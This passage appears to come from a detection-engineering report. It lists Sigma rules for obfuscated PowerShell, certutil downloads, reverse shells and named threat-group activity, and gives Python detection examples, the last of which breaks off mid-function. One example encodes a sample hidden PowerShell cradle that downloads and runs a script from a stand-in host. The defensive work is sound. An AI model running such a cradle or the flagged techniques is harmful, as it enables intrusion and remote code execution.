  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use MSHTA - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Clip - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references
  • Invoke-Obfuscation STDIN+ Launcher - Powershell - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - PowerShell - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - Powershell - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Powershell - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - PowerShell - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Potential PowerShell Obfuscation Using Character Join - Level: low
    Description: Detects specific techniques often used inside PowerShell scripts to obfuscate alias creation
  • Potential PowerShell Obfuscation Using Alias Cmdlets - Level: low
    Description: Detects Set-Alias or New-Alias cmdlet usage, which can be used as a means to obfuscate PowerShell scripts
  • File Decoded From Base64/Hex Via Certutil.EXE - Level: medium
    Description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
  • Suspicious Download Via Certutil.EXE - Level: medium
    Description: Detects the execution of certutil with certain flags that allow the utility to download files.
  • Suspicious File Downloaded From Direct IP Via Certutil.EXE - Level: high
    Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
  • Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE - Level: high
    Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
  • File Encoded To Base64 Via Certutil.EXE - Level: medium
    Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
  • Suspicious File Encoded To Base64 Via Certutil.EXE - Level: high
    Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the file extension is suspicious
  • File In Suspicious Location Encoded To Base64 Via Certutil.EXE - Level: high
    Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations
  • Certificate Exported Via Certutil.EXE - Level: medium
    Description: Detects the execution of certutil with the "exportPFX" flag, which allows the utility to export certificates.
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation CLIP+ Launcher - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
  • Invoke-Obfuscation STDIN+ Launcher - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation Via Stdin - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Ping Hex IP - Level: high
    Description: Detects a ping command that uses a hex encoded IP address
  • PowerShell Base64 Encoded Invoke Keyword - Level: high
    Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
  • PowerShell Base64 Encoded Reflective Assembly Load - Level: high
    Description: Detects base64 encoded .NET reflective loading of Assembly
  • Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call - Level: high
    Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
  • PowerShell Base64 Encoded WMI Classes - Level: high
    Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
  • Potential PowerShell Obfuscation Via Reversed Commands - Level: high
    Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
  • ConvertTo-SecureString Cmdlet Usage Via CommandLine - Level: medium
    Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the command line, which is fairly uncommon and could indicate potentially suspicious activity
  • Potential PowerShell Command Line Obfuscation - Level: high
    Description: Detects the PowerShell command lines with special characters
  • Potential Encoded PowerShell Patterns In CommandLine - Level: low
    Description: Detects specific combinations of encoding methods in PowerShell via the commandline
  • Base64 Encoded PowerShell Command Detected - Level: high
    Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
  • Potential PowerShell Obfuscation Via WCHAR - Level: high
    Description: Detects suspicious encoded character syntax often used for defense evasion
  • Suspicious XOR Encoded PowerShell Command - Level: medium
    Description: Detects presence of a potentially xor encoded powershell command
  • PUA - Potential PE Metadata Tamper Using Rcedit - Level: medium
    Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
  • Renamed AutoIt Execution - Level: high
    Description: Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.
  • Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image - Level: high
    Description: Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
  • Suspicious SYSTEM User Process Creation - Level: high
    Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
  • Turla Group Commands May 2020 - Level: critical
    Description: Detects commands used by Turla group as reported by ESET in May 2020
  • Potential Emotet Activity - Level: high
    Description: Detects all Emotet like process executions that are not covered by the more generic rules
  • Operation Wocao Activity - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Operation Wocao Activity - Security - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Potential CommandLine Obfuscation Using Unicode Characters - Level: medium
    Description: Detects potential CommandLine obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
  • Potential Suspicious Execution From GUID Like Folder Names - Level: low
    Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks. Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
  • Invoke-Obfuscation CLIP+ Launcher - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework (See reference section for code block)
  • Invoke-Obfuscation STDIN+ Launcher - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
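Several of the rules above match Base64-encoded PowerShell keywords such as "Invoke-" in their UTF-8 and UTF-16 forms. Base64 maps every three input bytes to four output characters, so the same keyword produces three different character sequences depending on where it falls in the encoded stream, and a substring match has to cover all three alignments with the characters that depend on neighbouring bytes trimmed off. The Python below is an added example written for this report, not Sigma project code: it derives those variants for a keyword and applies them to constructed process command lines. The `-enc` flag spellings it recognises and the sample payload are assumptions.

```python
import base64
import re
from typing import Optional


def b64_keyword_variants(keyword: str, encoding: str = "utf-16-le") -> list:
    """Return the three alignment-independent Base64 fragments for `keyword`.

    Prefixing 0, 1 and 2 dummy bytes reproduces every alignment the keyword
    can have inside a larger encoded blob. Characters that also encode bits
    of the dummy prefix, or of whatever follows the keyword, are trimmed.
    """
    raw = keyword.encode(encoding)
    variants = []
    for offset in range(3):
        padded = b"\x00" * offset + raw
        enc = base64.b64encode(padded).decode("ascii").rstrip("=")
        lead = (0, 2, 3)[offset]                  # chars tainted by the dummy prefix
        tail = 0 if len(padded) % 3 == 0 else 1   # char tainted by the bytes that follow
        variants.append(enc[lead:len(enc) - tail])
    return variants


# PowerShell accepts -e, -ec, -en, -enc and -EncodedCommand (assumption: only
# these spellings are handled). The argument is Base64 of a UTF-16LE string.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")

KEYWORDS = ("Invoke-", "FromBase64String")


def scan_encoded_command(cmdline: str) -> Optional[dict]:
    """Match keyword variants against the encoded blob without decoding it
    (what a rule engine can do), then decode for analyst confirmation.
    Returns None when the command line carries no encoded-command argument."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    hits = [
        (kw, enc, v)
        for kw in KEYWORDS
        for enc in ("utf-16-le", "utf-8")
        for v in b64_keyword_variants(kw, enc)
        if v in blob
    ]
    try:
        decoded = base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        decoded = None
    return {"hits": hits, "decoded": decoded}


# Constructed sample command lines (not captured from a real host).
PAYLOAD = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    f"powershell.exe -NoP -W Hidden -enc {ENCODED}",
    "powershell.exe -NoProfile -Command Get-Process",
]

if __name__ == "__main__":
    for v in b64_keyword_variants("Invoke-"):
        print(v)
    for ev in SAMPLE_EVENTS:
        print(scan_encoded_command(ev))
```

Running the generator for "Invoke-" in UTF-16LE yields SQBuAHYAbwBrAGUALQ, kAbgB2AG8AawBlAC0A and JAG4AdgBvAGsAZQAtA, which is the shape of the strings such rules carry; the same routine produces the UTF-8 set for cases where the attacker encodes an ASCII script rather than the UTF-16LE that -EncodedCommand expects. Matching on the encoded form keeps the check cheap and works in engines that cannot decode, while the decoded text is what an analyst triages.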
attack.t1059 95
Show Rules (95)
  • Lazarus Loaders - Level: critical
    Description: Detects different loaders as described in various threat reports on Lazarus group activity
  • Execution via MSSQL Xp_cmdshell Stored Procedure - Level: high
    Description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.
  • Wscript Execution from Non C Drive - Level: medium
    Description: Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.
  • Lateral Movement Indicator ConDrv - Level: low
    Description: This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should be correlated with 4624 and 4688 for further intrusion context.
  • Azure New CloudShell Created - Level: medium
    Description: Identifies when a new cloudshell is created inside of Azure portal.
  • BPFDoor Abnormal Process ID or Lock File Accessed - Level: high
    Description: Detects BPFDoor .lock and .pid file access in the temporary file storage facility
  • Suspicious Invocation of Shell via AWK - Linux - Level: high
    Description: Detects the execution of "awk" or its sibling commands to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
  • Capsh Shell Invocation - Linux - Level: high
    Description: Detects the use of the "capsh" utility to invoke a shell.
  • Atlassian Confluence CVE-2022-26134 - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
  • Shell Invocation via Env Command - Linux - Level: high
    Description: Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
  • Shell Execution via Git - Linux - Level: high
    Description: Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Potential Netcat Reverse Shell Execution - Level: high
    Description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
  • Python Spawning Pretty TTY Via PTY Module - Level: medium
    Description: Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
  • Inline Python Execution - Spawn Shell Via OS System Library - Level: high
    Description: Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
  • Shell Execution via Rsync - Linux - Level: high
    Description: Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Suspicious Invocation of Shell via Rsync - Level: high
    Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
  • Shell Invocation Via Ssh - Linux - Level: high
    Description: Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Suspicious Java Children Processes - Level: high
    Description: Detects java process spawning suspicious children
  • Potential Xterm Reverse Shell - Level: medium
    Description: Detects usage of "xterm" as a potential reverse shell tunnel
  • Suspicious Installer Package Child Process - Level: medium
    Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
  • Payload Decoded and Decrypted via Built-in Utilities - Level: medium
    Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
  • Suspicious Browser Child Process - MacOS - Level: medium
    Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
  • Hacktool Ruler - Level: high
    Description: Detects events that are generated when using the hacktool Ruler by SensePost
  • Windows Defender AMSI Trigger Detected - Level: high
    Description: Detects triggering of AMSI by Windows Defender.
  • Windows Defender Threat Detected - Level: high
    Description: Detects actions taken by Windows Defender malware detection engines
  • PCRE.NET Package Temp Files - Level: high
    Description: Detects processes creating temp files related to PCRE.NET package
  • Suspicious File Created In PerfLogs - Level: medium
    Description: Detects suspicious files, identified by their extension, being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
  • Windows Shell/Scripting Application File Write to Suspicious Folder - Level: high
    Description: Detects Windows shells and scripting applications that write files to suspicious folders
  • PCRE.NET Package Image Load - Level: high
    Description: Detects processes loading modules related to PCRE.NET package
  • Abusable DLL Potential Sideloading From Suspicious Location - Level: high
    Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
  • Windows Defender Exclusions Added - PowerShell - Level: medium
    Description: Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions
  • Potential Dosfuscation Activity - Level: medium
    Description: Detects possible payload obfuscation via the commandline
  • Unusual Parent Process For Cmd.EXE - Level: medium
    Description: Detects suspicious parent process for cmd.exe
  • Conhost Spawned By Uncommon Parent Process - Level: medium
    Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
  • Forfiles Command Execution - Level: medium
    Description: Detects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting.
  • Use of FSharp Interpreters - Level: medium
    Description: Detects the execution of the F# interpreters "FsiAnyCpu.exe" and "FSi.exe". Both can be used for AWL bypass and to execute F# code via scripts or inline.
  • Fsutil Behavior Set SymlinkEvaluation - Level: medium
    Description: Detects the use of "fsutil behavior set SymlinkEvaluation". A symbolic link is a type of file that contains a reference to another file. Ransomware is likely to change this setting to make sure it is able to follow symbolic links on the machine in order to find the original files to encrypt
  • Potential Arbitrary Command Execution Via FTP.EXE - Level: medium
    Description: Detects execution of "ftp.exe" with a script via the "-s" or "/s" flag and any child processes run by "ftp.exe".
  • Potential CobaltStrike Process Patterns - Level: high
    Description: Detects potential process patterns related to Cobalt Strike beacon activity
  • HackTool - Sliver C2 Implant Activity Pattern - Level: critical
    Description: Detects process activity patterns as seen being used by Sliver C2 framework implants
  • HackTool - Stracciatella Execution - Level: high
    Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
  • Use of OpenConsole - Level: medium
    Description: Detects usage of the OpenConsole binary as a LOLBIN to launch other binaries and bypass application whitelisting
  • Use of Pcalua For Execution - Level: medium
    Description: Detects execution of commands and binaries from the context of the Program Compatibility Assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
  • Suspicious Runscripthelper.exe - Level: medium
    Description: Detects execution of powershell scripts via Runscripthelper.exe
  • Wscript Shell Run In CommandLine - Level: medium
    Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity
  • Outlook EnableUnsafeClientMailRules Setting Enabled - Level: high
    Description: Detects an attacker trying to enable the Outlook security setting "EnableUnsafeClientMailRules", which allows Outlook to run applications or execute macros
  • Suspicious Remote Child Process From Outlook - Level: high
    Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
  • Perl Inline Command Execution - Level: medium
    Description: Detects execution of perl using the "-e"/"-E" flags. This could be used as a way to launch a reverse shell or execute live Perl code.
  • Php Inline Command Execution - Level: medium
    Description: Detects execution of php using the "-r" flag. This could be used as a way to launch a reverse shell or execute live PHP code.
  • PowerShell Download and Execution Cradles - Level: high
    Description: Detects PowerShell download and execution cradles.
  • Run PowerShell Script from Redirected Input Stream - Level: high
    Description: Detects PowerShell script execution via input stream redirect
  • PUA - Wsudo Suspicious Execution - Level: high
    Description: Detects usage of wsudo (Windows Sudo Utility), a tool that lets the user execute programs with different permissions (System, Trusted Installer, Administrator, etc.)
  • Python Inline Command Execution - Level: medium
    Description: Detects execution of python using the "-c" flag. This could be used as a way to launch a reverse shell or execute live Python code.
  • Python Spawning Pretty TTY on Windows - Level: high
    Description: Detects python spawning a pretty tty
  • Suspicious Greedy Compression Using Rar.EXE - Level: high
    Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
  • Suspicious RASdial Activity - Level: medium
    Description: Detects suspicious process related to rasdial.exe
  • Renamed CURL.EXE Execution - Level: medium
    Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
  • Renamed FTP.EXE Execution - Level: medium
    Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
  • Renamed NirCmd.EXE Execution - Level: high
    Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
  • Renamed PingCastle Binary Execution - Level: high
    Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
  • Ruby Inline Command Execution - Level: medium
    Description: Detects execution of ruby using the "-e" flag. This could be used as a way to launch a reverse shell or execute live Ruby code.
  • Elevated System Shell Spawned From Uncommon Parent Location - Level: medium
    Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from an uncommon parent location.
  • Potentially Suspicious Execution From Parent Process In Public Folder - Level: high
    Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
  • Writing Of Malicious Files To The Fonts Folder - Level: medium
    Description: Monitors for possible malicious files being hidden in the C:\Windows\Fonts\ location. Writing to and executing from this folder does not require admin privileges.
  • Suspicious Scan Loop Network - Level: medium
    Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
  • Suspicious Program Names - Level: high
    Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
  • Script Interpreter Execution From Suspicious Folder - Level: high
    Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables
  • Suspicious Script Execution From Temp Folder - Level: high
    Description: Detects suspicious script executions from temporary folders
  • Sysprep on AppData Folder - Level: medium
    Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
  • Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script - Level: medium
    Description: Detects execution of "VMwareToolBoxCmd.exe" with the "script" and "set" flags to set up a specific script to run for a specific VM state
  • Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script - Level: high
    Description: Detects execution of "VMwareToolBoxCmd.exe" with the "script" and "set" flags to set up a script located in a potentially suspicious location to run for a specific VM state
  • VMToolsd Suspicious Child Process - Level: high
    Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup
  • Add New Download Source To Winget - Level: medium
    Description: Detects usage of winget to add new additional download sources
  • Add Insecure Download Source To Winget - Level: high
    Description: Detects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
  • Add Potential Suspicious New Download Source To Winget - Level: medium
    Description: Detects usage of winget to add new potentially suspicious download sources
  • Install New Package Via Winget Local Manifest - Level: medium
    Description: Detects usage of winget to install applications via a manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option allows installing an application by passing a YAML file directly to the client; winget then downloads and installs the referenced exe, msi or msix files.
  • Turla Group Lateral Movement - Level: critical
    Description: Detects automated lateral movement by Turla group
  • Lazarus Group Activity - Level: critical
    Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
  • Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
  • Potential CVE-2021-40444 Exploitation Attempt - Level: high
    Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
  • REvil Kaseya Incident Malware Patterns - Level: critical
    Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) - Level: high
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE - Level: medium
    Description: Detects the execution of "csc.exe" via the "w3wp.exe" process. MOVEit Transfer hosts affected by this critical vulnerability execute "csc.exe" via "w3wp.exe" to dynamically compile malicious DLL files. Exploited hosts show evidence of a dynamically compiled DLL written to a path matching the pattern C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. Hunting opportunity: events from IIS dynamically compiling binaries via csc.exe on behalf of the MOVEit application, especially since May 27th, should be investigated.
  • DarkGate - Autoit3.EXE File Creation By Uncommon Process - Level: medium
    Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes constitute non-standard and suspicious ways to retrieve the Autoit3 executable.
  • DarkGate - Autoit3.EXE Execution Parameters - Level: high
    Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server.
  • Ursnif Redirection Of Discovery Commands - Level: high
    Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
  • DarkGate - Drop DarkGate Loader In C:\Temp Directory - Level: medium
    Description: Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder.
  • Potential KamiKakaBot Activity - Lure Document Execution - Level: medium
    Description: Detects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
  • DNS Request From Windows Script Host - Level: low
    Description: Detects unusual domain resolutions originating from CScript/WScript that can identify malicious javascript files executing in an environment, often as a result from a phishing or watering hole attack.
  • Elevated System Shell Spawned - Level: medium
    Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
  • Manual Execution of Script Inside of a Compressed File - Level: medium
    Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as the wscript and cscript binaries. In the query, the child process is the script interpreter that executes the script, and the script extension is one of the standard extensions that the Windows OS recognizes. Selections 1-3 cover three different execution scenarios: 1. Compressed file opened using 7-Zip. 2. Compressed file opened using WinRAR. 3. Compressed file opened using the native Windows File Explorer capabilities. When the malicious script is double-clicked, it is extracted to the respective directory, as signified by the CommandLine in each of the three selections, and then executed using the relevant script interpreter.
  • Automated Turla Group Lateral Movement - Level: medium
    Description: Detects automated lateral movement by Turla group
  • Quick Execution of a Series of Suspicious Commands - Level: low
    Description: Detects multiple suspicious process in a limited timeframe
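The interpreter inline-execution rules (Perl/Php/Python/Ruby), the rsync shell rule and the MOVEit csc.exe rule in the list above all reduce to a handful of checks on process-creation fields. The following is an added example, not code from the SigmaTACT report or the Sigma project, that implements those checks in Python over constructed events. The event field names (image, parent_image, command_line, parent_command_line), the sample command lines and the case-insensitive path matching are assumptions; the App_Web path pattern is the one quoted in the MOVEit rule description above.

```python
"""Process-creation checks behind several of the rules listed above.

Added example, not code from the SigmaTACT report or the Sigma project.
Event records are constructed inline; the field names are assumptions that
mirror Sysmon Event ID 1 / auditd-style process-creation telemetry.
"""
import re
import shlex
from dataclasses import dataclass

@dataclass
class ProcEvent:
    image: str                # path of the created process
    parent_image: str         # path of the parent process
    command_line: str         # command line of the created process
    parent_command_line: str  # command line of the parent process

# Interpreter -> single-letter flags that run code passed on the command line
# (Perl/Php/Python/Ruby Inline Command Execution rules).
INLINE_FLAGS = {"perl": {"e", "E"}, "php": {"r"}, "python": {"c"}, "ruby": {"e"}}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "csh"}

# Path pattern quoted in the MOVEit rule description above (case-insensitive
# matching is an assumption; NTFS paths are case-insensitive).
APP_WEB_DLL = re.compile(
    r"C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\"
    r"([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll",
    re.IGNORECASE,
)

def basename(path: str) -> str:
    """Last component of a Windows or POSIX path, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()

def argv(command_line: str) -> list:
    """Tokenize a command line; fall back to whitespace splitting on unbalanced quotes."""
    try:
        return shlex.split(command_line, posix=True)
    except ValueError:
        return command_line.split()

def interpreter_name(exe: str) -> str:
    """'python3.11', 'perl5.36.exe', 'php.exe' -> 'python', 'perl', 'php'."""
    m = re.match(r"[a-z]+", re.sub(r"\.exe$", "", exe))
    return m.group(0) if m else exe

def inline_interpreter_exec(ev: ProcEvent) -> bool:
    """Interpreter started with its inline-code flag. Only the interpreter's own
    options are inspected: scanning stops at the first non-option argument, so a
    '-c' that belongs to a script is not counted."""
    flags = INLINE_FLAGS.get(interpreter_name(basename(ev.image)))
    if not flags:
        return False
    for arg in argv(ev.command_line)[1:]:
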